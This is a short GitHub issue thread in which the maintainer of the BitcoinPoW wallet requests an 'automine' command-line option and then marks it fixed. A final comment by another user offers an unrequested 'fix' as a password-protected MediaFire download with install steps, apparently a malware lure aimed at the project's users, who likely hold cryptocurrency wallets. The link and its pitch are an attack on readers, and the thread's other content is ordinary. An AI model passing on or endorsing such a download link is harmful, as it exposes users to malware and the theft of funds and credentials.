### ISSUE TITLE
Add automine argument

### ISSUE THREAD

**Issue by bitcoin-pow** [bitcoin-pow/BitcoinPoW#69]
When the argument 'automine' is set to one, the wallet should start mining when started using the active wallet.
./bitcoin-pow-qt  -automine=1
Default behavior is to NOT auto mine.

**Comment by bitcoin-pow** [comment]
Fixed in https://github.com/bitcoin-pow/BitcoinPoW/issues/67

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
